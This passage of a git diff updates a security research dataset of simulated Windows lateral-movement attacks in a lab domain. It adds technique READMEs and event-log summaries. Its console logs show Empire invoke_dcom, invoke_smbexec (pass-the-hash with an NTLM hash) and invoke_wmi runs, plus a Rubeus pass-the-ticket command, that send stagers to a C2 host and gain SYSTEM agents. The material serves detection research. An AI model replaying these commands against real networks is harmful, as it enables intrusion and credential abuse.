ImageLoad) | 414 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 286 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 31 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 7 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 880 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Empire Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_dcom +(Empire: powershell/lateral_movement/invoke_dcom) > info + + Name: Invoke-DCOM + Module: powershell/lateral_movement/invoke_dcom + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @rvrsh3ll + +Description: + Invoke commands on remote hosts via MMC20.Application COM object over DCOM. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Method True ShellWindows COM method to use. MMC20.Application,She + llWindows,ShellBrowserWindow,ExcelDDE + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_dcom) > set Listener https +(Empire: powershell/lateral_movement/invoke_dcom) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_dcom) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 3 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_dcom +(Empire: powershell/lateral_movement/invoke_dcom) > Completed + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent YR1FKZ6A checked in +[+] Initial agent YR1FKZ6A from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to YR1FKZ6A at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_dcom) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:11:59 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:11:59 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:11:58 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:11:58 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:11:58 https + EXBNZYTS ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 6728 5/0.0 2019-05-18 21:12:02 https + + YR1FKZ6A ps 172.18.39.105 IT001 SHIRE\pgustavo powershell 5228 5/0.0 2019-05-18 21:12:01 https + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz new file mode 100644 index 00000000..517f95f4 Binary files /dev/null and b/small_datasets/windows/lateral_movement/distributed_component_object_model_T1175/empire_invoke_dcom.tar.gz differ diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md index 213c82f8..e616a4c5 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/README.md @@ -4,8 +4,8 @@ Pass the ticket (PtT) is a method of authenticating to a system using Kerberos t ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_rubeus_ptt](./empire_rubeus_asktgt_ptt.md) | 2019-03-19145126 | -| empire | shire | [empire_rubeus_ptt_createnetonly](./empire_rubeus_asktgt_ptt_createnetonly.md) | 2019-03-19151006 | -| empire | shire | [empire_mimikatz_opth](./empire_mimikatz_opth.md) | 2019-03-19131123 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_rubeus_ptt](./empire_rubeus_asktgt_ptt.md) | 2019-03-19145126 | +| shire | [empire_rubeus_ptt_createnetonly](./empire_rubeus_asktgt_ptt_createnetonly.md) | 2019-03-19151006 | +| shire | [empire_mimikatz_opth](./empire_mimikatz_opth.md) | 2019-03-19131123 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md index 9a77e366..1609cf64 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_mimikatz_opth.md @@ -1,4 +1,3 @@ - # Empire Mimikatz Over-Pass-The-Hash When sekurlsa::pth is used to over-pass-the-hash, Mimikatz first creates a new logon type 9 process with dummy credentials - this creates a new "sacrificial" logon session that doesn't interact with the current logon session. It then opens the LSASS process with the ability to write to process memory, and the supplied hash/key is then patched into the appropriate section for the associated logon session (in this case, the "sacrificial" logon session that was started). This causes the normal Kerberos authentication process to kick off as normal as if the user had normally logged on, turning the supplied hash into a fully-fledged TGT. [Reference](https://github.com/GhostPack/Rubeus) @@ -60,7 +59,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2051 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 373 | -## Empire Activity +## Attacker Activity ``` (Empire: 8BLV6USC) > usemodule credentials/mimikatz/pth* diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md index 24fa5546..9e897a46 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt.md @@ -1,4 +1,3 @@ - # Empire Rubeus PTT The asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4, /aes128, /aes256, or /des). A /password flag can also be used instead of a hash - in this case /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options. If no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session. @@ -56,7 +55,7 @@ Shire | Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 1 | | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 279 | -## Empire Activity +## Attacker Activity ``` Rubeus.exe asktgt /user:Mmidge /rc4:b415baa073a14f81f8c89a2a384f4a68 /ptt diff --git a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md index dcd3640b..45405706 100644 --- a/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md +++ b/small_datasets/windows/lateral_movement/pass_the_ticket_T1097/empire_rubeus_asktgt_ptt_createnetonly.md @@ -1,4 +1,3 @@ - # Empire Rubeus PTT CreateNetOnly The asktgt action will build raw AS-REQ (TGT request) traffic for the specified user and encryption key (/rc4, /aes128, /aes256, or /des). A /password flag can also be used instead of a hash - in this case /enctype:X will default to RC4 for the exchange, with des|aes128|aes256 as options. If no /domain is specified, the computer's current domain is extracted, and if no /dc is specified the same is done for the system's current domain controller. If authentication is successful, the resulting AS-REP is parsed and the KRB-CRED (a .kirbi, which includes the user's TGT) is output as a base64 blob. The /ptt flag will "pass-the-ticket" and apply the resulting Kerberos credential to the current logon session. The /luid:0xA.. flag will apply the ticket to the specified logon session ID (elevation needed) instead of the current logon session. @@ -83,7 +82,7 @@ Shire | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 917 | | Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 11 | -## Empire Activity +## Attacker Activity ``` (Empire: G6BYHU4F) > diff --git a/small_datasets/windows/lateral_movement/powershell_T1086/README.md b/small_datasets/windows/lateral_movement/powershell_T1086/README.md new file mode 100644 index 00000000..d6e30ab7 --- /dev/null +++ b/small_datasets/windows/lateral_movement/powershell_T1086/README.md @@ -0,0 +1,9 @@ +# PowerShell + +PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. + +## Technique Variations Table + +| RT Platform | Network | Dataset | Updated | +| ----------- | ------- | --------- | ------- | +| empire | shire | [empire_invoke_psremoting](../../execution/powershell_T1086/empire_invoke_psremoting.md) | 2019-05-18211456 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md index 7b073fc9..994a213b 100644 --- a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md +++ b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/README.md @@ -6,6 +6,6 @@ Adversaries may also copy files laterally between internal victim systems to sup ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_scm_dll_hijack_ikeext](./empire_scm_dll_hijack_ikeext.md) | 2019-04-03133337 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_scm_dll_hijack_ikeext](./empire_scm_dll_hijack_ikeext.md) | 2019-04-03133337 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md index 675ec542..78d5ffc2 100644 --- a/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md +++ b/small_datasets/windows/lateral_movement/remote_file_copy_T1105/empire_scm_dll_hijack_ikeext.md @@ -1,4 +1,3 @@ - # SCM and Dll Hijacking IKEEXT Instead of creating new services, attackers can move laterally using the SCM by copying specifically crafted Dynamic Link Library (DLL) files to trusted directories and restarting services remotely. This is made possible due to the fact that these services call LoadLibrary on libraries not present in the specified path. @@ -65,7 +64,7 @@ Shire | Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 835 | | Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 421 | -## Empire Activity +## Attacker Activity ``` (Empire: NZB6SE34) > upload /tmp/wlbsctrl.dll diff --git a/small_datasets/windows/lateral_movement/service_execution_T1035/README.md b/small_datasets/windows/lateral_movement/service_execution_T1035/README.md new file mode 100644 index 00000000..c6bddf53 --- /dev/null +++ b/small_datasets/windows/lateral_movement/service_execution_T1035/README.md @@ -0,0 +1,9 @@ +# Service Execution + +Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation. + +## Technique Variations Table + +| RT Platform | Network | Dataset | Updated | +| ----------- | ------- | --------- | ------- | +| empire | shire | [empire_invoke_psexec](../../execution/service_execution_T1035/empire_invoke_psexec.md) | 2019-05-18210652 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md b/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md new file mode 100644 index 00000000..793360aa --- /dev/null +++ b/small_datasets/windows/lateral_movement/trusted_developer_utilities_T1127/README.md @@ -0,0 +1,9 @@ +# Trusted Developer Utilities + +There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_msbuild](../../defense_evasion/trusted_developer_utilities_T1127/empire_invoke_msbuild.md) | 2019-05-18213907 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md new file mode 100644 index 00000000..6659ef63 --- /dev/null +++ b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/README.md @@ -0,0 +1,11 @@ +# Windows Admin Shares + +Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMIN$, and IPC$. + +Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_smbexec](./empire_invoke_smbexec.md) | 2019-05-18210125 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md new file mode 100644 index 00000000..7b1fffa1 --- /dev/null +++ b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.md @@ -0,0 +1,146 @@ +# Empire Invoke Smbexec + +Executes a stager on remote hosts using SMBExec.ps1 + +## Technique(s) ID + +T1077 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_smbexec.tar.gz](./empire_invoke_smbexec.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18210125 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 738 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 2 | +| System | LsaSrv | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 214 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 104 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 40 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 6 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 4 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 3 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Credential Validation | 1 | +| Security | Microsoft-Windows-Security-Auditing | Security System Extension | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 461 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 458 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 310 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 190 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 36 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 27 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 649 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Attacker Activity + +``` +(Empire: TKV35P8X) > usemodule lateral_movement/invoke_smbexec +(Empire: powershell/lateral_movement/invoke_smbexec) > info + + Name: Invoke-SMBExec + Module: powershell/lateral_movement/invoke_smbexec + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @rvrsh3ll + +Description: + Executes a stager on remote hosts using SMBExec.ps1 + +Comments: + https://raw.githubusercontent.com/Kevin-Robertson/Invoke- + TheHash/master/Invoke-SMBExec.ps1 + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Service False Name of service to create and delete. + Defaults to 20 char random. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + Username True Username. + Domain False Domain. + Hash True NTLM Hash in LM:NTLM or NTLM format. + Agent True TKV35P8X Agent to run module on. + Listener True Listener to use. + Proxy False default Proxy to use for request (default, none, + or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + +(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo +(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain shire +(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 8ece039f32592670b45fc801e2a9157d +(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_smbexec) > execute +[*] Tasked TKV35P8X to run TASK_CMD_WAIT +[*] Agent TKV35P8X tasked with task ID 27 +[*] Tasked agent TKV35P8X to run module powershell/lateral_movement/invoke_smbexec +(Empire: powershell/lateral_movement/invoke_smbexec) > Command executed with service PWXYXULFULYYGFYDYBIF on IT001.shire.com + + +[*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent XSZ91N7T checked in +[+] Initial agent XSZ91N7T from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to XSZ91N7T at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_smbexec) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:02:06 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:02:09 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:02:08 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:02:10 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:02:08 https + +(Empire: agents) > +``` \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz new file mode 100644 index 00000000..0552b658 Binary files /dev/null and b/small_datasets/windows/lateral_movement/windows_admin_shares_T1077/empire_invoke_smbexec.tar.gz differ diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md index 4e2877d2..a5e26ef0 100644 --- a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md +++ b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/README.md @@ -1,9 +1,11 @@ -# Windows Management Instrumentation +# Windows Management Instrumentation (WMI) -An adversary can use WMI to move laterally in the environment +Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. ## Technique Variations Table -| RT Platform | Network | Dataset | Updated | -| ----------- | ------- | --------- | ------- | -| empire | shire | [empire_invoke_wmi](./empire_invoke_wmi.md) | 2019-03-19152813 | \ No newline at end of file +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_wmi](../../execution/windows_management_instrumentation_T1047/empire_invoke_wmi.md) | 2019-05-18214442 | +| shire | [empire_invoke_wmi_debugger](../../execution/windows_management_instrumentation_T1047/empire_invoke_wmi_debugger.md) | 2019-05-18215622 | +| shire | [empire_wmic_add_user_backdoor](../../execution/windows_management_instrumentation_T1047/empire_wmic_add_user_backdoor.md) | 2019-05-18231333 | \ No newline at end of file diff --git a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md b/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md deleted file mode 100644 index cab83ebe..00000000 --- a/small_datasets/windows/lateral_movement/windows_management_instrumentation_T1047/empire_invoke_wmi.md +++ /dev/null @@ -1,167 +0,0 @@ - -# Empire Invoke WMI - -An adversary can use powershell to execute a stager via WMI - -## Technique(s) ID - -T1047 - -## Creators - -Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) - -## Dataset - -[empire_invoke_wmi.tar.gz](./empire_invoke_wmi.tar.gz) - -## Network Environment - -Shire - -## Time Taken - -2019-03-19152813 - -## About this file - -| log_name | source_name | task | record_number | -|-------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| -| Windows PowerShell | PowerShell | Pipeline Execution Details | 1039 | -| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | -| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | -| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 858 | -| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 237 | -| Security | Microsoft-Windows-Security-Auditing | Logon | 23 | -| Security | Microsoft-Windows-Security-Auditing | Group Membership | 20 | -| Security | Microsoft-Windows-Security-Auditing | Logoff | 20 | -| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 16 | -| Security | Microsoft-Windows-Security-Auditing | Special Logon | 15 | -| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 11 | -| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 7 | -| Security | Microsoft-Windows-Security-Auditing | File Share | 6 | -| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 3 | -| Security | Microsoft-Windows-Security-Auditing | Process Creation | 3 | -| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | -| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 1 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 517 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 454 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 375 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 234 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 48 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 22 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 6 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 4 | -| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 870 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | -| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | -| Microsoft-Windows-DNS-Client/Operational | Microsoft-Windows-DNS-Client | na | 377 | -| Microsoft-Windows-Bits-Client/Operational | Microsoft-Windows-Bits-Client | na | 4 | - -## Empire Activity - -``` -(Empire: MPB3UHD1) > usemodule lateral_movement/invoke_wmi -(Empire: powershell/lateral_movement/invoke_wmi) > info - - Name: Invoke-WMI - Module: powershell/lateral_movement/invoke_wmi - NeedsAdmin: False - OpsecSafe: True - Language: powershell -MinLanguageVersion: 2 - Background: False - OutputExtension: None - -Authors: - @harmj0y - -Description: - Executes a stager on remote hosts using WMI. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True https Listener to use. - CredID False CredID from the store to use. - ComputerName True HR001.shire.com Host[s] to execute the stager on, comma - separated. - Proxy False default Proxy to use for request (default, none, - or other). - UserName False [domain\]username to use to execute - command. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). - Password False Password to use to execute command. - Agent True MPB3UHD1 Agent to run module on. - -FDC01.shire.comhell/lateral_movement/invoke_wmi) > set ComputerName H -(Empire: powershell/lateral_movement/invoke_wmi) > info - - Name: Invoke-WMI - Module: powershell/lateral_movement/invoke_wmi - NeedsAdmin: False - OpsecSafe: True - Language: powershell -MinLanguageVersion: 2 - Background: False - OutputExtension: None - -Authors: - @harmj0y - -Description: - Executes a stager on remote hosts using WMI. - -Options: - - Name Required Value Description - ---- -------- ------- ----------- - Listener True https Listener to use. - CredID False CredID from the store to use. - ComputerName True HFDC01.shire.com Host[s] to execute the stager on, comma - separated. - Proxy False default Proxy to use for request (default, none, - or other). - UserName False [domain\]username to use to execute - command. - ProxyCreds False default Proxy credentials - ([domain\]username:password) to use for - request (default, none, or other). - UserAgent False default User-agent string to use for the staging - request (default, none, or other). - Password False Password to use to execute command. - Agent True MPB3UHD1 Agent to run module on. - -(Empire: powershell/lateral_movement/invoke_wmi) > execute -[*] Tasked MPB3UHD1 to run TASK_CMD_WAIT -[*] Agent MPB3UHD1 tasked with task ID 5 -[*] Tasked agent MPB3UHD1 to run module powershell/lateral_movement/invoke_wmi -(Empire: 